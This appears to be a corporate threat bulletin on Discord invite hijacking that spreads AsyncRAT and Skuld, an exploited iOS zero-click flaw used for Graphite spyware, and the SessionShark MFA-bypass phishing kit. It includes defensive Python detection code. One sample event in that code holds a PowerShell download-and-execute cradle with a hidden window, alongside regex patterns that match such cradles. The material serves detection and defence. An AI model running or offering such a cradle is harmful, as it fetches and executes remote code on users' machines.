
NormCyber Threat Bulletin: 18th June 2025

Vulnerability discovered in Discord custom invitation links

A critical vulnerability has been discovered in Discord’s invitation system. It allows attackers to hijack the vanity (custom) link registration system and use the hijacked links to distribute the Remote Access Trojan AsyncRAT and the information stealer Skuld.

The method observed involves attackers gaining control of deleted or expired invitation links. Users can create temporary, permanent and vanity (custom) invites through Discord. Discord prevents the re-use of expired or deleted permanent and temporary invitation links by legitimate servers. However, it has been discovered that vanity invitation links can be re-registered after expiry, or in some cases after deletion.

With control of the custom invite link, the attacker redirects unsuspecting users to a malicious server. There they are asked to complete a verification step and are directed to a “verify” button to prove ownership of their wallet. Clicking this button executes JavaScript that copies a PowerShell command to the clipboard. Users are then told to open the Windows Run dialog, paste their “verification string” (the PowerShell command) and press Enter to verify their account.

Unfortunately for the user, this is not a legitimate account verification: running the command downloads a PowerShell script hosted on Pastebin. That script retrieves and executes a first-stage downloader, which in turn drops and executes Skuld Stealer and AsyncRAT from a remote server.

Figure 1 – Initial infection chain from Check Point research
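One way to surface the Run-dialog PowerShell step of this chain in endpoint telemetry, as an added example that is not part of the original bulletin or Check Point’s research: a small scorer over constructed process-creation events (field names loosely modelled on Sysmon Event ID 1 and assumed, not an exact schema) that flags PowerShell launched from explorer.exe together with a download cradle, a hidden window or encoded command, or a paste site used as the payload host.

```python
import re

# Constructed process-creation events, loosely modelled on Sysmon Event ID 1
# fields; not real telemetry, and the field names are an assumption.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://pastebin.com/raw/PLACEHOLDER | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ExecutionPolicy Bypass -w hidden -enc AAAA"},
]

# Traits that recur in the clipboard-to-Run-dialog chain described above.
CRADLE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I)
PASTE_HOST = re.compile(r"https?://(www\.)?pastebin\.com/", re.I)

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if not ev["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    cmd = ev["CommandLine"]
    # A command typed into Win+R runs as a child of explorer.exe.
    if ev["ParentImage"].lower().endswith(r"\explorer.exe"):
        reasons.append("interactive launch from explorer.exe (Run dialog)")
    if CRADLE.search(cmd):
        reasons.append("download-and-execute cradle")
    if HIDDEN.search(cmd):
        reasons.append("hidden window or encoded command")
    if PASTE_HOST.search(cmd):
        reasons.append("paste site used as payload host")
    return len(reasons), reasons

def flag_events(events, threshold=2):
    """Indexes of events scoring at or above the threshold."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= threshold]

if __name__ == "__main__":
    for i in flag_events(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(score_event(SAMPLE_EVENTS[i])[1])}")
```

The legitimate scheduled script (event 1) and the service-launched encoded command (event 2) each score one trait and stay below the threshold, so the combination of traits, not any single one, drives the alert.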

AsyncRAT is a Remote Access Trojan with significant remote access capabilities. It uses a technique known as “dead drop resolver” (MITRE ATT&CK T1102.001), in which attackers post content, often an obfuscated or encoded URL or IP address, on a legitimate web service. Infected systems contact the seemingly legitimate service, decode the embedded address and are redirected to the attacker’s actual command-and-control infrastructure.

Skuld Stealer is malware written in Go and designed to target Windows systems. Its purpose is to harvest sensitive data from Discord, gaming platforms, crypto wallets and browsers.

References:
Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets (thehackernews.com)
The Discord Invite Loop Hole Hijacked for Attacks (research.checkpoint.com)
Hackers use Discord invite links to deliver malware (mitrade.com)
Web Service: Dead Drop Resolver, Sub-technique T1102.001 – Enterprise (attack.mitre.org)

CISA Adds iOS Zero-Click Vulnerability to its Known Exploited Vulnerabilities Catalogue

The United States Cybersecurity and Infrastructure Security Agency (CISA) has recently issued a high-priority alert regarding a critical zero-click vulnerability in Apple’s iOS operating system. The vulnerability is tracked as CVE-2025-43200 and can enable attackers to compromise iOS, iPadOS, macOS, watchOS and visionOS devices without any user interaction whatsoever. No CVSS or EPSS scoring data is currently available for this vulnerability because of the recency of the discovery.

The vulnerability stems from a logic issue in Apple’s Messages application when processing maliciously crafted photos or videos shared via iCloud links, meaning an attacker need only send a malicious media file to the target. No interaction from the target user is required, so once the exploit has been triggered an attacker could gain full access to the device, allowing remote code execution and total device control.

Citizen Lab, a digital rights research group, has observed this zero-click vulnerability being exploited in the wild to install spyware tracked as “Graphite”. Graphite is a sophisticated spyware product developed by Paragon and typically sold to and used by government and intelligence agencies. Once installed, it can access sensitive information including:

  • Messages/Emails
  • Microphone & Camera Feeds
  • Location data
  • Call logs
  • Contact lists

Apple had already patched CVE-2025-43200 in iOS 18.3.1 and related updates released on February 10, 2025, but did not publicly disclose the exploit’s details until June, after Citizen Lab’s findings were published. Devices running earlier versions remained vulnerable through early 2025.

References:
CISA Alerts: iOS Zero Click Flaw Actively Exploited (gbhackers.com)
Graphite Caught: First Forensic Confirmation of Paragon’s iOS Mercenary Spyware Finds Journalists Targeted (citizenlab.ca)
Paragon ‘Graphite’ Spyware Linked to Zero-Click Hacks on Newest iPhones (securityweek.com)
Graphite Spyware Used to Infect iPhones of European Journalists (bitdefender.com)

SessionShark – The Evolving Phishing Threat Bypassing MFA

A new and particularly insidious phishing kit known as SessionShark has emerged, posing a significant risk to organisations utilising Microsoft Office 365.

What is SessionShark?
SessionShark is a phishing toolkit that enables attackers to steal login credentials and session tokens, bypassing MFA protections on Microsoft Office 365 accounts. It employs an adversary-in-the-middle (AiTM) technique, directing victims to highly realistic fake login pages that mimic Microsoft’s interface. These pages capture credentials and session cookies in real time, granting attackers immediate account access. SessionShark is sold on cyber crime forums with subscription plans and Telegram-based support, making it accessible to low-skill attackers.

The phishing-kit-as-a-service model reflects a growing trend in cyber crime, where attackers design and market their tools with usability and scalability in focus. Similar to the ransomware-as-a-service (RaaS) model, phishing kits like SessionShark are now frequently offered through subscription plans, providing developers with consistent revenue and expanding their user base.

Figure 2 – The ‘educational’ terms of service for SessionShark

Why It Matters
SessionShark’s ability to bypass MFA, a cornerstone of modern cyber security, makes it a serious threat. Stolen session tokens allow attackers to access sensitive data, send fraudulent emails, or escalate attacks within networks. SessionShark’s advanced features, like anti-bot technology and Cloudflare proxy integration, complicate detection and takedown efforts. For organisations, this increases the risk of data breaches, financial losses, and reputational damage.

Key Features of SessionShark
SessionShark boasts a range of advanced features that make it particularly dangerous. It bypasses multi-factor authentication by capturing session tokens, allowing attackers to access accounts without requiring one-time passcodes. Its phishing pages are high-fidelity replicas of the Office 365 login interface and dynamically adapt to appear legitimate, reducing the likelihood of user suspicion. To evade detection, SessionShark employs anti-bot tactics such as CAPTCHAs and custom scripts that block automated security scanners. The infrastructure is often hidden behind Cloudflare proxies, making it difficult to trace or block via IP-based methods. Additionally, the kit integrates with Telegram to send real-time alerts to attackers when credentials and tokens are successfully harvested.

Mitigation Strategies
While SessionShark presents a formidable challenge, several measures can significantly reduce the risk of a successful attack:

  1. User Education is Paramount: A well-informed workforce is the first and most vital line of defence. Employees should be trained to verify URLs carefully, looking out for misspellings, suspicious domains, or non-HTTPS connections. Encourage healthy scepticism toward unexpected login prompts, even if they appear legitimate, and foster a culture where suspicious emails or websites are promptly reported to IT security.
  2. Strengthen Technical Defences: Adopt phishing-resistant MFA methods such as FIDO2/WebAuthn security keys, whose credentials are bound to the legitimate site’s origin, so an AiTM proxy on a look-alike domain cannot complete the authentication. Enforce Conditional Access policies in Microsoft Entra ID to restrict access based on risk factors like unusual locations or unfamiliar devices, and consider reducing session lifetimes. Use advanced security tools like Microsoft Defender for Office 365 for real-time URL scanning, behavioural analysis, and AI-based detection. Monitor user activity for anomalies such as logins from unexpected locations or unusually long sessions, and implement DMARC to protect your domain from spoofing.
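To show why origin binding defeats an AiTM proxy, here is an added example (not code from the bulletin, from SessionShark, or from Microsoft) that models the relying-party side of a WebAuthn assertion check. The RP ID, the allowed origin and the phishing host name are assumed values, and the signature verification step is deliberately left out so that the origin and rpIdHash checks stand alone.

```python
import base64, hashlib, json, secrets

# Relying-party (RP) values assumed for this example; not Microsoft's real ones.
RP_ID = "login.example-tenant.test"
ALLOWED_ORIGINS = {"https://" + RP_ID}

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def browser_client_data(challenge: bytes, page_origin: str) -> bytes:
    # The browser, not the page's script, writes the origin it is really on.
    return json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                       "origin": page_origin}).encode()

def authenticator_data(rp_id: str, sign_count: int = 1) -> bytes:
    # rpIdHash || flags (UP bit set) || signCount, following the WebAuthn layout.
    return hashlib.sha256(rp_id.encode()).digest() + b"\x01" + sign_count.to_bytes(4, "big")

def verify_assertion(issued: bytes, client_data: bytes, auth_data: bytes) -> str:
    """RP-side checks on clientDataJSON and authenticatorData. The signature over
    authData || sha256(clientDataJSON) is not checked here; a real RP verifies
    it only after these checks pass."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return "rejected: wrong ceremony type"
    if cd.get("challenge") != b64url(issued):
        return "rejected: challenge mismatch"
    if cd.get("origin") not in ALLOWED_ORIGINS:
        return "rejected: origin not allowed"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return "rejected: rpIdHash does not match RP ID"
    return "ok"

def legitimate_login() -> str:
    challenge = secrets.token_bytes(32)
    cd = browser_client_data(challenge, "https://" + RP_ID)
    return verify_assertion(challenge, cd, authenticator_data(RP_ID))

def aitm_proxied_login(phishing_host: str = "login.m1crosoft-example.test") -> str:
    # The proxy relays the genuine challenge, but the victim's browser is on the
    # phishing origin: it embeds that origin and only permits an RP ID matching
    # the phishing host. (A real authenticator would hold no credential for that
    # RP ID; it is modelled as answering anyway to show the RP-side rejection.)
    challenge = secrets.token_bytes(32)
    cd = browser_client_data(challenge, "https://" + phishing_host)
    return verify_assertion(challenge, cd, authenticator_data(phishing_host))
```

Contrast this with a password plus one-time passcode, which the proxy can relay unchanged: nothing in that exchange names the origin the user typed it into, so the RP has no way to tell the two flows apart.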

SessionShark shifts the game – phishing is no longer just about stolen credentials. By capturing session tokens, it bypasses MFA and enables account takeover faster than ever. Organisations must pivot beyond relying solely on MFA, adopting layered detection and session-centric defences.

References:
SessionShark Steals Session Tokens to Slip Past Office 365 MFA (slashnext.com)
‘SessionShark’ ToolKit Evades Microsoft Office 365 MFA (darkreading.com)
MFA Under Attack: AiTM Phishing Kits Abusing Legitimate Services (darktrace.com)

Norm tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.